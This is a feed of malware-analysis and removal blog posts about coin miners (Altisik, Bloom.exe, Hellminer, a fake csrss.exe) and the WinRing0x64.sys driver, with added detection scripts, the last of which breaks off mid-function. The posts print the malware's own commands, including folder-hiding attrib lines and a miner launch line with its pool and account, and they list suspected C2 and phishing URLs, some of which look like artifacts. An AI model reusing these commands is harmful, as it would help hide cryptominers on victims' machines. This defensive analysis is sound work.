The sample employs stalling tactics, including long periods of inactivity, to hinder dynamic analysis. This also helps with circumventing some of the antivirus sandboxes: seeing no activity, one will report that the file is safe.

Persistence and Privilege Escalation

Altisik miner achieves persistence and elevates its privileges by installing itself as a system service. It executes specific shell commands to run helper processes like AltisikHelper.exe and AltisikHelper.dll, which are designed to prevent users from manually terminating the mining activity. Furthermore, Altisik creates a DirectInput object to read keystrokes, indicating it captures user input. While it is unlikely that Altisik functions as a keylogger, this input capturing could be used for other purposes, such as monitoring user activity to avoid detection or interference.

Let’s look closer: The miner maintains persistence in the system as a service, which grants it elevated privileges. It executes the following shell commands:

"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\AltisikDevPL/AltisikHelper.dll",#1
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\WerFault.exe -u -p 4328 -s 548
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

The AltisikHelper.exe and AltisikHelper.dll processes are needed to prevent the user from manually stopping the mining process. Further analysis revealed that the miner creates a DirectInput object, which allows it to read keystrokes. It is unlikely that the Altisik miner can act as a keylogger, but there are quite a few other applications for input capturing.
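Added here as an example, not code from the original post: two checks a defender can run after an Altisik-style infection. The first reads the Windows Defender real-time protection values at the registry paths listed earlier in this analysis; the second lists services whose command line points into a user-writable folder (Temp, AppData, ProgramData), which is the pattern of the rundll32 + AltisikHelper.dll launch above. The "user-writable" regex is an assumption, and legitimate vendor services can match it too, so treat hits as leads rather than verdicts.

```powershell
# Added example (not from the original post): post-infection checks for the two
# Altisik behaviours described above, Defender tampering and service-based persistence.

function Get-DefenderRealtimeState {
    # Keys and value names as listed in the analysis; the PassiveMode value lives
    # directly under the Windows Defender key
    $checks = @(
        @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection';          Name = 'DisableRealtimeMonitoring' },
        @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableRealtimeMonitoring' },
        @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender';                               Name = 'PassiveMode' }
    )
    foreach ($c in $checks) {
        $item  = Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue
        $state = '(not set)'
        if ($null -ne $item) { $state = $item.($c.Name) }
        # A value of 1 means real-time protection is switched off (or Defender is passive);
        # "(not set)" means no override is present at that location
        [pscustomobject]@{ Key = $c.Key; Value = $c.Name; Data = $state }
    }
}

function Find-ServicesInUserWritablePaths {
    # Regular services start their binaries from System32 or Program Files. A service command
    # line that references AppData or ProgramData, including as a DLL argument to rundll32.exe
    # rather than as the host executable, matches the persistence pattern shown above.
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -match '(?i)\\(Users\\[^\\]+\\AppData|ProgramData)\\' } |
        ForEach-Object {
            [pscustomobject]@{
                Service   = $_.Name
                State     = $_.State
                StartMode = $_.StartMode
                Command   = $_.PathName
            }
        }
}

Get-DefenderRealtimeState        | Format-Table -AutoSize
Find-ServicesInUserWritablePaths | Format-Table -AutoSize -Wrap
```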

Network Communication

Altisik uses network communication to send and receive data necessary for its mining operations. The miner communicates with the api.altruistics.org server, likely used for monitoring, control, or data transmission. This may include the miner’s status, statistics, or other mining-related parameters. The response is in text/html format, indicating that the server is returning a web page or text-based data. It also uses Cloudflare DNS 104.18.7.80 and 104.18.6.80, potentially complicating traffic analysis.

How To Remove Altisik?

To get rid of Altisik service, I recommend using GridinSoft Anti-Malware – an effective and easy-to-use antivirus that will quickly repel any threats present in the system. First, though, I would recommend entering Safe Mode with Networking: go to the Start menu → click Restart while holding down the Shift key on the keyboard.

Press Shift + restart to open Windows Recovery menu

When your PC reboots, in the menu that appears after restarting, select “Troubleshoot” → “Advanced options” → “Startup Settings” → “Restart”.

Advanced options on the recovery menu

Next, select the Safe Mode with Networking and press the corresponding key (usually F5, though it may vary depending on your Windows version).

Startup settings screenshot

Hint: If you have any problems with switching to Safe Mode, please read our guide: How to Remove a Virus From a Computer in Safe Mode.

After switching to the Safe Mode with Networking, follow the steps below:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the action that the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished


Bloom.exe https://gridinsoft.com/blogs/bloom-exe/ https://gridinsoft.com/blogs/bloom-exe/#respond Sat, 29 Jun 2024 20:42:56 +0000 https://gridinsoft.com/blogs/?p=23173 Bloom.exe is a malicious miner that masquerades as a legitimate process. Its job is to use the victim’s device to mine cryptocurrency for con actors. The most visible sign of its presence, aside from the process in the Task Manager, is an enormously high CPU load that comes from it. This effectively renders your system […]

The post Bloom.exe appeared first on Gridinsoft Blog.

Bloom.exe is a malicious miner that masquerades as a legitimate process. Its job is to use the victim’s device to mine cryptocurrency for con actors. The most visible sign of its presence, aside from the process in the Task Manager, is an enormously high CPU load that comes from it. This effectively renders your system unusable, causing stutters and even crashes.

Bloom.exe Miner Overview

Bloom.exe is a process created by coin miner malware. This class of malware exploits the hardware of the victim’s system to mine cryptocurrency. The name “Bloom.exe” serves only to make the malware look like a legitimate process and confuse the user. Like other malicious miners of this kind, it mines Monero or DarkCoin, with all profits going to the attacker.

Bloom.exe in the Task Manager screenshot
Bloom.exe in the Task Manager

The Bloom.exe miner monitors system usage and adjusts its resource consumption accordingly. This makes it less noticeable, as it does not consume all available resources the way other miners do. Additionally, Bloom.exe is able to use GPU resources, improving the effectiveness of the mining process and making the malware activity harder to detect (if you’re not gaming or don’t pay attention to fan noise levels).

Spreading Methods

As for distribution, Bloom.exe is similar to the other miners. It is mainly distributed under the guise of legitimate software. The second, but almost as popular method is drive-by downloads and illegal software, such as pirated games or cracked programs.

A less effective but no less popular method of distribution is malvertising. Con actors can hijack search results for popular software to lead users to their sites instead of the genuine ones. Instead of getting the installer of a program, users download and run malware, with the Bloom.exe miner being among them.

Technical Analysis

Let’s take a closer look at how this miner behaves. In fact, the majority of miner malware behaves rather similarly, regardless of whether it is stand-alone or based on XMRig or another well-known open-source project.

Traditionally, malware begins its life cycle by checking for a virtual environment, sandbox, or debugging tools. To do this, our sample checks the following registry keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls

These keys contain some system settings and Windows security policies. Besides doing these checks, this malware often has its code packed, encrypted and obfuscated. These “passive” protection measures make Bloom.exe a tough nut for basic antiviruses.

C2 Communication

The malware uses several addresses for communications, including TCP 204.79.197.203:443, which belongs to Microsoft. This is possibly because fraudsters use some of the cloud services Microsoft offers to anyone. Although such resources are easy to take down, it is just as easy to create new ones. There are also several addresses that could potentially belong to the command server:

https://pdfcrowd.com/?ref=pdf
https://pdfcrowd.com/doc/api/?ref=pdf
https://gettodaveriviedt0.com/secur3-appleld-verlfy1/?16shop

Payload

After all the checks and communications, the malware drops a payload on the system. It also loads a large number of files into the %windir%\System32\ folder, among which are:

C:\Windows\System32\OHcvDRK.exe
C:\Windows\System32\ROKnunx.exe
C:\Windows\System32\TAtNGGl.exe
C:\Windows\System32\WQDfJPu.exe

These are only a small part of what the malware brings to the system; the longer the malware is active, the more of these files will appear. Inside these files are either modules that provide certain functionality, or mining configurations.

How to Remove Bloom.exe?

To effectively remove Bloom.exe, I recommend using GridinSoft Anti-Malware, as it will easily detect and stop any malicious program, including this miner. Contrary to manual removal, this program will find every single element of the malware, ensuring that it won’t come back.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the action that the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished


What Is WinRing0x64.sys and Is It Safe to Remove? https://gridinsoft.com/blogs/winring0x64-sys-process/ https://gridinsoft.com/blogs/winring0x64-sys-process/#respond Wed, 19 Jun 2024 09:33:42 +0000 https://gridinsoft.com/blogs/?p=19829 WinRing0x64.sys is a low-level driver that provides direct hardware access for legitimate applications like hardware monitoring tools and RGB lighting controllers. While not inherently malicious, this driver can be exploited by malware due to its privileged access to system components. This comprehensive guide explains what WinRing0x64.sys is, which software uses it, how to identify legitimate […]

The post What Is WinRing0x64.sys and Is It Safe to Remove? appeared first on Gridinsoft Blog.

WinRing0x64.sys is a low-level driver that provides direct hardware access for legitimate applications like hardware monitoring tools and RGB lighting controllers. While not inherently malicious, this driver can be exploited by malware due to its privileged access to system components. This comprehensive guide explains what WinRing0x64.sys is, which software uses it, how to identify legitimate vs. malicious instances, and provides detailed removal instructions when necessary.

File Name: WinRing0x64.sys
Type: Device Driver / System File
Developer: Various (including OpenLibSys, Noriyuki MIYAZAKI)
Common Locations: C:\Windows\System32\drivers\, C:\Program Files\[Software Name]\, C:\Users\[Username]\AppData\
Legitimate Usage: Hardware monitoring, overclocking tools, RGB lighting control
Risk Level: Low (when from legitimate sources); High (when exploited by malware)
Can Be Removed?: Yes, by uninstalling associated software

What Is WinRing0x64.sys?

WinRing0x64.sys is a specialized system driver designed to provide applications with direct low-level access to hardware components. This driver operates in Ring 0 (kernel mode) – the most privileged level in the Windows operating system architecture, which explains its name. By bypassing the standard APIs provided by Windows, it allows software to interact directly with hardware for specific functions that require privileged access.

The driver originated from the OpenLibSys project, but various software developers have created their own versions. It’s primarily used for legitimate purposes such as:

  • Hardware monitoring (CPU/GPU temperatures, fan speeds)
  • Graphics card overclocking
  • RGB lighting control for PC components
  • System diagnostics and benchmarking
  • Advanced power management
Windows file properties dialog showing details of legitimate WinRing0x64.sys driver with proper digital signature and file information
File properties of a legitimate WinRing0x64.sys driver showing proper digital signature

When legitimately installed, this driver is typically digitally signed and placed in standard system directories. However, its powerful capabilities make it an attractive target for malware authors who may exploit it or create malicious copies that mimic its functionality.

What Legitimate Software Uses WinRing0x64.sys?

Several reputable software applications rely on WinRing0x64.sys to function properly. If you have any of these programs installed, finding this driver on your system is expected and normal:

Software Category | Program Names | Purpose
Hardware Monitoring | CPU-Z, HWiNFO, AIDA64, HWMonitor | Reading system temperatures, voltages, and fan speeds
Overclocking Tools | MSI Afterburner, EVGA Precision X1, AMD Ryzen Master | Adjusting GPU/CPU clock speeds and voltages
RGB Lighting Control | Corsair iCUE, MSI Mystic Light, ASUS Aura Sync | Controlling RGB lighting effects on PC components
Diagnostic Tools | Intel Processor Diagnostic Tool, PassMark PerformanceTest | Testing and diagnosing system hardware
Developer Tools | RWEverything, Noriyuki MIYAZAKI tools | Low-level hardware access for development purposes

Because the way this driver is used resembles some malware techniques, security software may occasionally flag WinRing0x64.sys as suspicious. This happens because both legitimate tools and malware may need to access hardware directly, making it difficult for security programs to distinguish between benign and malicious usage patterns.

Security Concerns with WinRing0x64.sys

While WinRing0x64.sys is not inherently malicious, its powerful capabilities create potential security vulnerabilities:

  • Privileged Access: The kernel-level access that makes this driver useful also makes it dangerous if compromised
  • Exploitation Vector: Malware developers can use the driver as an exploitation tool to bypass security measures
  • Unsigned Copies: Malicious versions may lack proper digital signatures or use stolen certificates
  • Resource Usage: When exploited by malware (especially cryptominers), the driver can facilitate excessive resource consumption

In October 2019, CVE-2019-18845 was issued for a vulnerability in WinRing0.sys (an earlier version of the driver) that could allow attackers to execute code with kernel privileges. This further illustrates why security researchers are cautious about such powerful drivers.

How to Distinguish Between Legitimate and Malicious Instances

Determining whether WinRing0x64.sys on your system is legitimate or malicious requires investigating several factors:

Signs of Legitimate Usage

  • You have installed hardware monitoring, overclocking, or RGB lighting software
  • The driver is digitally signed by a reputable company
  • The file is located in a standard system driver directory or within a known application folder
  • System resource usage remains normal
  • The driver was installed alongside recognized legitimate software

Red Flags for Malicious Usage

  • The driver appeared without installing any related legitimate software
  • WinRing0x64.sys is running but you don’t have any hardware monitoring or RGB control applications
  • The file lacks a digital signature or has an invalid signature
  • Abnormal system resource usage (high CPU, memory, or disk activity)
  • The driver is located in an unusual directory
  • Security software reports other malware detections alongside it
Windows Task Manager showing a suspicious WinRing0x64.sys process consuming system resources, highlighted among running processes
Task Manager showing a potentially suspicious instance of WinRing0x64.sys – note the process name and resource consumption

If you’re unsure about the nature of WinRing0x64.sys on your system, consider these scenarios:

  • Scenario 1: You’ve installed EVGA Precision X1 for your graphics card, and WinRing0x64.sys is flagged by your antivirus. This is likely a false positive.
  • Scenario 2: You have a basic laptop with integrated graphics, no RGB components, and haven’t installed any monitoring tools, yet WinRing0x64.sys appears in Task Manager. This is suspicious and warrants investigation.

How to Check if WinRing0x64.sys Is Legitimate

To determine if the WinRing0x64.sys on your system is legitimate, follow these steps:

  1. Verify File Location: Check where the file is stored. Legitimate versions typically reside in:
    • C:\Windows\System32\drivers\
    • Installation directories of hardware utilities (e.g., C:\Program Files\EVGA Precision X1\)
  2. Check Digital Signature: Right-click the file, select Properties, and go to the Digital Signatures tab. Verify that:
    • The file is signed by a recognized publisher
    • The signature is valid and hasn’t expired
  3. Review Associated Software: Identify which program installed the driver by checking:
    • Recently installed applications
    • Control Panel > Programs and Features
    • Windows Event Log for recent driver installations
  4. Monitor Resource Usage: Keep an eye on system performance when WinRing0x64.sys is running:
    • Open Task Manager to monitor CPU and memory usage
    • Check if related processes are consuming excessive resources
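Added here as an example, not code from the original article: a PowerShell function that automates steps 1 to 3 above. It finds every WinRing0x64.sys on the system drive, reads the file's Authenticode signature, reports whether it sits in one of the standard locations named above, and shows which driver service (if any) is registered to load it. Step 4, resource usage, is left to Task Manager; the list of "standard" folders is an assumption.

```powershell
# Added example (not from the original article): locate and assess WinRing0x64.sys copies.

function Get-WinRing0Instances {
    param([string]$SearchRoot = "$env:SystemDrive\")

    # Index kernel driver services by normalized image path so each file can be tied to its service
    $driverByPath = @{}
    Get-CimInstance Win32_SystemDriver | ForEach-Object {
        if ($_.PathName) {
            $p = ($_.PathName.Trim('"') -replace '^\\\?\?\\', '').ToLowerInvariant()
            $driverByPath[$p] = $_
        }
    }

    # Folders where a legitimately installed copy is expected (assumption based on the table above)
    $standardRoots = @("$env:SystemRoot\System32\drivers", $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ }

    Get-ChildItem -Path $SearchRoot -Filter 'WinRing0x64.sys' -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $sig  = Get-AuthenticodeSignature -FilePath $file.FullName
            $svc  = $driverByPath[$file.FullName.ToLowerInvariant()]

            $inStandardDir = $false
            foreach ($root in $standardRoots) {
                if ($file.FullName.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $inStandardDir = $true
                }
            }

            $signer = '(none)'
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }

            $loadedBy = '(no driver service registered)'
            if ($svc) { $loadedBy = "$($svc.Name) [$($svc.State)]" }

            # A valid signature in an expected folder matches the "signs of legitimate usage";
            # anything else is not proof of malice, only a reason to look closer
            $verdict = 'review'
            if ($sig.Status -eq 'Valid' -and $inStandardDir) { $verdict = 'looks legitimate' }

            [pscustomobject]@{
                Path             = $file.FullName
                StandardLocation = $inStandardDir
                SignatureStatus  = $sig.Status      # Valid, NotSigned, HashMismatch, UnknownError ...
                Signer           = $signer
                DriverService    = $loadedBy
                Verdict          = $verdict
            }
        }
}

Get-WinRing0Instances | Format-List
```

A copy marked "review" that is unsigned, lives outside any application folder and has a driver service registered for it lines up with several of the red flags listed earlier.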

When and How to Remove WinRing0x64.sys

WinRing0x64.sys is not a critical Windows component and can be safely removed if needed. However, removing it directly is not recommended. Instead, you should uninstall the software that installed it, which will properly remove the driver in most cases.

When to Consider Removal

  • You’ve confirmed the driver is being used maliciously
  • You no longer need the software that installed it
  • The driver is causing system instability or conflicts
  • You want to reduce potential security risks

Method 1: Remove Associated Software (Recommended)

  1. Press Win + I to open Settings
  2. Go to Apps > Apps & features
  3. Search for and select the software that installed WinRing0x64.sys (e.g., EVGA Precision, Corsair iCUE, CPU-Z)
  4. Click Uninstall and follow the prompts
  5. Restart your computer to complete the removal process

Method 2: Disable the Driver (Advanced Users)

  1. Press Win + R, type “services.msc” and press Enter
  2. Search for services related to the driver or associated software
  3. Right-click the service and select Properties
  4. Change the Startup type to “Disabled”
  5. Click Stop to halt the service
  6. Click Apply and OK
  7. Restart your computer

Method 3: Remove Malicious Instances with Anti-Malware Software

If you suspect that WinRing0x64.sys on your system is malicious or has been exploited, follow these steps to remove it:

  1. Boot your computer in Safe Mode with Networking:
    • Press Win + I to open Settings
    • Go to Update & Security > Recovery
    • Under Advanced startup, click Restart now
    • Select Troubleshoot > Advanced options > Startup Settings > Restart
    • After restart, press F5 to select Safe Mode with Networking
  2. Download and install GridinSoft Anti-Malware
  3. Update the malware definitions
  4. Perform a full system scan
  5. Allow the software to quarantine and remove detected threats
  6. Restart your computer in normal mode
  7. Run another scan to ensure all threats have been removed
GridinSoft Anti-Malware scan interface showing active system scan for malware detection including suspicious driver files
Perform a comprehensive scan with GridinSoft Anti-Malware to detect and remove malicious instances of WinRing0x64.sys
GridinSoft Anti-Malware results screen showing detected threats including suspicious system drivers with removal options
Review scan results and remove any detected threats related to WinRing0x64.sys exploitation

Prevention Tips and Best Practices

To minimize risks associated with WinRing0x64.sys and similar powerful drivers, follow these best practices:

  • Download software only from official sources – Avoid third-party download sites which may bundle malware with legitimate applications
  • Keep your operating system and drivers updated – This ensures you have the latest security patches for known vulnerabilities
  • Use reputable security software – A good antivirus/anti-malware solution can detect suspicious driver activity
  • Check driver signatures – Be wary of unsigned or improperly signed drivers
  • Monitor system performance – Unusual resource consumption could indicate exploitation
  • Limit privileged software – Only install hardware management tools when necessary
  • Regularly audit installed software – Remove applications you no longer use to reduce your attack surface

Conclusion

WinRing0x64.sys itself is not malicious and serves legitimate purposes for hardware monitoring, overclocking, and RGB control software. However, its powerful low-level access makes it a potential target for exploitation by malware authors. By understanding its purpose, recognizing legitimate uses, and knowing how to identify suspicious instances, you can better protect your system.

If you suspect malicious use of WinRing0x64.sys on your system, don’t hesitate to perform a thorough scan with reliable security software. In most cases, proper removal involves uninstalling the associated application rather than attempting to delete the driver file directly.


Hellminer.exe Coin Miner https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/ https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/#respond Thu, 13 Jun 2024 15:51:29 +0000 https://gridinsoft.com/blogs/?p=20683 Hellminer.exe is a process you can see in the Task Manager that indicates a malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it. Hellminer malware has a potential to attack a […]

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

Hellminer.exe is a process you can see in the Task Manager that indicates a malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it.

Hellminer malware has the potential to attack a wide range of devices, from IoT to server clusters. The final target of its activity is bringing profit to its masters with the use of your hardware. Ignoring the activity of this malicious program may lead to premature hardware failure and overall performance deterioration.

Modern malware samples often come in packs, meaning that one thing may signify the presence of several others. Do not hesitate with removal: scan your device with GridinSoft Anti-Malware and remove all the threats in one click. 👉🏼 Get your system cleaned up.

What is the Hellminer.exe process?

This is a process associated with a malicious coin miner. Such malware aims at exploiting the system’s hardware to mine cryptocurrencies, mainly DarkCoin and Monero. To maximize profits, hackers who stand behind this malware establish huge networks of infected computers. Hellminer takes up to 80% of CPU power in order to get substantial mining performance, making the system sluggish and uncomfortable to use.

Hellminer process Task Manager
Hellminer.exe process in Task Manager

Malicious miners like this one typically get into user systems through malvertising on the Web, or with the use of dropper malware. Both of these spreading methods are also commonly used by other malware, so there is a risk that Hellminer is not the only infection running in the system.

This malware appears to be different from other miners, as it is not based on XMRig, a popular open-source mining software. Instead, it appears to be written in Python, and is likely a private development. Let’s check out other interesting stuff I’ve found during the analysis.

Hellminer Malware Analysis

It is not completely clear how Hellminer gets into the system; I suspect it is not much different from how malware miners typically spread – via dropper malware and malvertising. After the launch, the malware begins with a selection of anti-VM and anti-debug checks.

Hellminer Execution chain

Using calls to WMI, it gets information about the CPU, trying to find any signs of virtualization. The reason I don’t think this is just routine information gathering is that the very next step is listing the services and processes. Hellminer specifically looks for traces of the VMWare virtualization environment. After these checks, the main payload is unfolded. The malware may also use the information collected at this stage to configure the mining process or as part of the system fingerprint.

wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list

Fingerprinting starts with another call to WMIC, wmic os get Version. The malware attempts to collect quite a basic, if not scarce, set of data – just information about the operating system. After that, the malware gains persistence by manipulating another command and making a series of changes in the Windows registry.

%windir%\System32\svchost.exe -k WerSvcGroup – starting Windows error reporting service to make it run the malware. This increases the level of privileges the malicious program has, also providing it with a disguise.

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security – changing network security policies.

The final round of persistence involves another call to WMI, specifically to its Adaptation Service. Hellminer forces it to recursively launch the payload, ensuring continuous execution. This specific command is also a part of resource allocation for the mining process.

wmiadap.exe /F /T /R

Command Server Connectivity

Same as other miner malware, Hellminer does not have any extensive C2 communication. After finishing the steps above, it sends a blob of system information to the command server, effectively notifying it about its readiness. The C2 returns a configuration file, which specifies the mining pool and the IP address to connect to.

Still, there is one thing that catches the eye – the form of command servers used by this malware. They do not look like C2 of the classic model, instead being peer-to-peer. In such a network, the role of a command server is given to one of the infected computers. The “real” server sporadically communicates with that one, retrieving information about new devices and assigning the next system to take the C2 role. This drastically increases the resilience of the network, making it particularly hard to disrupt by taking down a command server.

During the analysis, I’ve detected these command servers:


Hellminer.exe Removal Guide

Removing Hellminer malware requires scanning with anti-malware software. Such threats typically duplicate themselves into numerous folders across the system, with each copy acting as a backup. GridinSoft Anti-Malware will remove the malicious miner and all its copies in a matter of minutes.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection – malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

Miner malware activity always correlates with cryptocurrency prices. At the moment, they are on the rise, meaning that more and more fraudsters will opt for this kind of malware. The typical way malicious miners spread is malvertising, particularly in search engines. Avoiding it requires user attention: such ads typically mimic legitimate sites that distribute freeware, but always have a different, mangled URL.

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

Csrss.exe Trojan Virus
https://gridinsoft.com/blogs/csrss-exe-process-troubleshooting/ – Thu, 13 Jun 2024 12:01:01 +0000

Csrss.exe is an important Windows process which may sometimes consume a lot of system resources and puzzle users with such behavior. Some people may mistake it for a trojan virus and try to terminate it forcefully. So, is csrss.exe dangerous? And how do you fix the issues it creates? Let's find out.

What is Csrss.exe?

Csrss.exe is a legitimate Windows process with the full name Client Server Runtime Process, and it is critical to the system. This process is present in all modern Windows versions, and it is not uncommon to notice several instances running at the same time. Such a phenomenon is normal and is not considered a sign of viruses. The system runs one upon startup, and terminating it leads to a BSoD.

In Windows 7, 8, and 10 this process is responsible for console programs, shutdown processes, starting another vital process – conhost.exe – and other critical system functions. It uses few resources in normal operation, so there is no reason to terminate it. It is needed for system shutdown, Virtual DOS Machine (VDM) support and other system functions such as Ctrl+C and Ctrl+Break signal processing, user switching, and mounting and unmounting disks. As a legacy function, csrss.exe is responsible for opening the console window, but only to the extent of launching the conhost.exe process.

Csrss.exe BSOD – How to Fix?

Sometimes, after unsuccessful manipulations with the csrss.exe file or other system files, Windows may become unstable or fail to start. Corruption of important Windows system files can cause this. The solution is as follows:

Go to Troubleshooting > Advanced Options > Command Prompt in the recovery environment. At the command prompt that launches, execute the following command:

sfc /scannow /offbootdir=C:\ /offwindir=C:\Windows

After entering the command, press Enter and wait for the process to complete. This may take some time, but be sure to wait until the end, as it is required to finish the system files’ repair. After that, close the command prompt and restart your computer.

Sfc command result

Analysis of a Real Trojan Virus

We found several samples of malware posing as csrss.exe.

Users often download them themselves: opening an unknown attachment from a spam message infects the computer with this kind of malware. Malware developers usually have a plan B as well: they bundle the same malware with the installers of various free programs. So if you click through the installation without looking at the advanced settings, be prepared for your computer to be infected with malware like this.

We discovered a sample of Trojan.CoinMiner written in Delphi, which is distributed via spam mail:

Trojan Coin Miner PEiD v0.95

GridinSoft Anti-Malware detects it as "Trojan.Win32.CoinMiner.dd".

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Other antivirus programs detect Trojan.CoinMiner (csrss.exe) as:

  • DrWeb: Trojan.Hosts.6838
  • Emsisoft: Trojan.Agent.CEQQ (B)
  • ESET-NOD32: a variant of Win64/BitCoinMiner.AP potentially unsafe
  • Kaspersky: not-a-virus:RiskTool.Win64.BitCoinMiner.cev

Trojan Miner Dropped Files

The trojan drops its files into the folder C:\Windows\MicrosoftU:

  • Auto.bat
  • Start.vbs
  • Start2.vbs
  • Hide.bat
  • Start.bat
  • Start2.bat
  • 1.bat
  • 2.bat
  • Srvany.exe
  • Csrss.exe
  • Srvanyx.exe

After Trojan.CoinMiner has been unpacked, it hides its presence using the commands in Hide.bat, which set the hidden and system attributes on the folder and its files:

attrib C:\Windows\MicrosoftU +S +H /S /D
attrib C:\Windows\MicrosoftU\*.* +S +H /S /D

Trojan Miner uses the name of one of the system files “csrss.exe” to hide its presence in the system.

Csrss.exe virus starts with the following parameters:

  • stratum+tcp://xmr.pool.minergate.com:45560 – the mining pool the miner connects to
  • tatyana.kostomarova@gmail.com – the login (pool account) under which mining is performed
  • cryptonight – the mining algorithm

Another parameter is the number of threads the program will run. This "miner" has a formula for calculating the number of processor cores involved; it is in the .bat file that launches the "miner" for the first time:

set /a CPU=%NUMBER_OF_PROCESSORS%/2+1
Srvanyx -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u tatyana.kostomarova@gmail.com -p x -t %CPU%

Nah, it's fine, the computer is just slightly slowing down

High CPU & GPU Troubleshooting

If you encounter abnormal GPU and CPU consumption by the csrss.exe process, you should first check the file location. To verify it, right-click on the process and select "Open file location". It should be located in "%SYSTEMROOT%\system32".

Csrss.exe file in system32 folder

Next, right-click on the file and select "Properties", then the "Details" tab. This file's Product Name should be "Microsoft® Windows® Operating System". Also, the Copyright field should read "© Microsoft Corporation. All rights reserved."

Original csrss file properties

If it is the original csrss.exe file, it may cause a high CPU/GPU load due to incorrect operation of the functions it is responsible for.

The Client Server Runtime Process’s excessive GPU consumption was previously a recognized problem in one of the Windows cumulative updates. However, Microsoft addressed the issue through various updates and hotfixes. You may still be using an older Windows version with this problem. If so, go to the Windows updates section and click “Check for updates“.

Windows Update

The next step is to update your GPU drivers. If you have an Nvidia GPU, open GeForce Experience, and under the "Drivers" tab click "Check for updates" and follow the instructions. If you have an AMD GPU, check the Radeon software for updates. It is vital to download drivers from official websites. Please avoid using low-trust sites or third-party installers like driver packs.

Nvidia driver update process

If the problem persists, run an SFC scan. To do this, run Command Prompt as administrator and paste the “sfc /scannow” command into it.

If the process csrss.exe still loads the device after all the manipulations, you can create a new user profile. To add a new user profile to your PC, go to Settings (gear icon) and select Accounts. Under Family & Other Users, click Add another person to this PC. Choose “I don’t have this person’s sign-in information” and then select “Add a user without a Microsoft account”. Fill in the details and click Next. Remember to grant administrator privileges only to those you trust.

Manage another account

Note: This guide is relevant for users of Windows 10. Windows 11 lacks the option to add a local account and asks you to use a Microsoft account.

Creating an online account in Windows 11

Is CSRSS.exe a Trojan Virus?

First, any claim that the "csrss.exe" file located in "C:\Windows\System32\" is a trojan virus is false. Low user knowledge along with unintelligible process names make system process names an excellent option for hiding malware. Usually, malware tries to infect or disguise itself as critical system processes of the operating system, and many viruses use the name of that process or executable file so as not to make you suspicious. Each session creates a separate process, allowing several dozen instances to run simultaneously.

Nevertheless, a constant high CPU and GPU load from csrss.exe is a good reason to worry. Even in this case, there are two explanations for the abnormal process behavior: malware and user profile corruption. The original "csrss.exe" executable is stored in only one place – the "C:\Windows\System32\" directory. If only one OS is installed on the device, substituting or overwriting this file in the standard directory is almost impossible.

That being said, finding the files named “csrss.exe” in other directories on your PC is a sign of malware activity. To remove the threat, launch GridinSoft Anti-Malware.
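The two checks above, the location rule for csrss.exe and the miner launch line from the trojan's batch file, automated as an added example (not code from the Gridinsoft post). The process records, the placeholder login and the -t value are constructed; only the file names, the drop folder and the pool address come from the post.

```python
import ntpath
import re
from typing import Optional

SYSTEM32 = r"C:\Windows\System32"  # the only place the genuine csrss.exe lives
# Stratum pool URL as used by XMRig-style miners: stratum+tcp://host:port
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://(?P<host>[^:/\s]+):(?P<port>\d+)", re.I)


def expected_threads(number_of_processors: int) -> int:
    """Thread count from the dropper's batch formula
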